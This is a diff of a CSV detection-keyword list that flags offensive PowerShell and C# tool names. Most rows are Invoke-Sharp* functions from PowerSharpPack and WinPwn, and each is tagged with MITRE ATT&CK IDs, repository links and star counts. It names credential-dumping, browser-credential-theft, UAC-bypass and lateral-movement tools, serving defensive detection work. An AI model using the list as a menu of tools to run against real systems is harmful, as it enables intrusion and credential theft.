-"*Invoke-SharpGPO-RemoteAccessPolicies*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpHandler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpHide*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*InvokeSharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*Invoke-Sharphound*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharphound2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharphound3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpHound4*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharphound4*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpImpersonation*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpImpersonation*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpImpersonationNoSpace*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharplocker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpLoginPrompt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpMove*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpPrinter*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpPrinter*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpPrintNightmare*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpRDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-ShareFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-SharpAllowedToAct*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpBlock*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpBypassUAC*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpChromium*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpClipboard*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpCloud*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpCloud*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharpcradle*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpDPAPI*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharPersist*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpGPO*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpGPOAbuse*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpGPO-RemoteAccessPolicies*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHandler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHide*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*InvokeSharpHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Invoke-Sharphound*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharphound2*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharphound3*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpHound4*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharphound4*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpImpersonation*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpImpersonation*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpImpersonationNoSpace*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Sharplocker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpLoginPrompt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpMove*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpPrinter*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpPrinter*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpPrintNightmare*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpRDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-SharpRDP.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SharpSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpSecDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharpshares*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSniper*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSploit*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharpsploit_nomimi*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpSSDP*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpStay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpUp*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpUp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharpview*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpWatson*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharpweb*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Sharpweb*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SharpSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SharpSecDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Sharpshares*","offensive_tool_keyword","PowerSharpPack","Many 